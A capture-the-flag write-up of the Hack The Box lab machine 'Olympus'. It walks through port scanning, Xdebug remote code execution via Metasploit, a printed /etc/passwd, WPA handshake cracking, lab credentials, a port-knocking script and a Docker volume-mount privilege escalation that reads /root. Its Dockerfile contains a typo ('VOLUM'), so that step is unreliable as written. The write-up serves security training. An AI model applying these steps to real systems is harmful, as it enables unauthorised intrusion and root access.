Writeup: Hack The Box - Machines - Olympus

(Updated: )
writeups
,

Description

  • Name: Olympus
  • IP: 10.10.10.83
  • Author: OscaAkaElvis
  • Difficulty: 5.3/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.83

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
22/tcp   filtered ssh
53/tcp   open     domain  (unknown banner: Bind)
| dns-nsid:
|_  bind.version: Bind
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    Bind
80/tcp   open     http    Apache httpd
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-City of olympia
| ssh-hostkey:
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|   256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)

Pwn

The web server has just the index.php with a Zeus statue photo, we discovered anything using dirsearch so we analyzed the request:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 10.10.10.83
User-Agent: HTTPie/0.9.8


HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 224
Content-Type: text/html; charset=UTF-8
Date: Fri, 17 Aug 2018 16:45:48 GMT
Keep-Alive: timeout=5, max=100
Server: Apache
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5

	<!DOCTYPE HTML>
		<html>
		<head>
			<title>Crete island - Olympus HTB</title>
			<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
			<link rel="shortcut icon" href="favicon.ico">
			<link rel="stylesheet" type="text/css" href="crete.css">
		</head>
		<body class="crete">
		</body>
		</html>

We saw that the Xdebug header was set (version 2.5.5).

Xdebug is used on development to debug PHP applications, set breakpoints, see variables, check objects and execute code from the developer machine.

Since we can have this power we can use the Xdebug header to inject code and start a meterpreter session.

Metasploit has a nice module called exploit/unix/http/xdebug_unauth_exec that we can use to initiate a XDEBUG_SESSION and upload the code to download the meterpreter stage.

In this machine there is only one user with a home directory: zeus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
zeus:x:1000:1000::/home/zeus:/bin/bash

But we also discovered that the apache web service is running in a docker container since the IP address of the macine was in the 172.20.0.0 subnet and also LinEnum found that:

1
2
3
4
5
6
7
8
9
10
11
10:cpuset:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
9:devices:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
8:blkio:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
7:perf_event:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
6:memory:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
5:net_cls,net_prio:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
4:freezer:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
3:cpu,cpuacct:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
2:pids:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
1:name=systemd:/docker/f00ba96171c58d55c6bf1a2e6796dca8c36e565d7aacfcc3bcd593c9214edcf9
-rwxr-xr-x 1 root root 0 Apr  8 17:50 /.dockerenv

The tool also found a Dockerfile in Zeus home directory: /home/zeus/airgeddon/Dockerfile.

In Zeus home directory we found a version of airgeddon used to intercept/capture WPA/WPA2 handshakes.

In captured folder we found a captured.cap file that could contains an encrypted handshake for a wifi network.

We downloaded the file and with cap2hccapx to convert the file we used hashcat to crack the wifi password.

We got the SSID Too_cl0se_to_th3_Sun and the Wi-Fi password flightoficarus; we then started to expect more Greek mythology names and gods to use in the next steps.

We tried to login as Zeus and Icarus using the Wi-Fi password but we got a SSH login using icarus username and Too_cl0se_to_th3_Sun password on port 2222.

With the help of gods, Athena in this case, we got a domain name: ctfolympus.htb.

And using drill to ask the Bind server on port 53 to return the TXT record we got another hint.

The hint clearly states that to login as prometheus user with password St34l_th3_F1re! we need to port knock on 3456, 8234 and 62431 ports in order to open the SSH port (22, that one from nmap resulted as filtered).

1
2
3
4
5
6
7
#!/usr/bin/env zsh

HOST=$1
shift
for ARG in "$@"; do
  nmap -Pn --max-retries 0 -p $ARG $HOST
done

With a simple script we used nmap to trigger the ports in sequence and wait for the SSH to ask the user password.

In the olympus machine we found the first flag and another message.

From LinEnum and ps aux | grep root we found out that this machine is the owner of all docker container on port 80, 53 and 2222 (Apache, Bind and SSH) and with the hint (serve) we thought that we had to use docker to privesc from prometheus to root since the user could run docker commands.

Hijacking the running containers we were unable to read the root flag even though the user in the container was root: no access on the local volume used in the container (as it should be!).

We then created a Dockerfile to extend a local container (no access on external resources like Docker Hub) to mount the /root folder.

1
2
3
FROM crete

VOLUM /root

And with docker build . -t dodo we created the image; now to run the container we issued
docker run -v /root:/root -t dodo cat /root/root.txt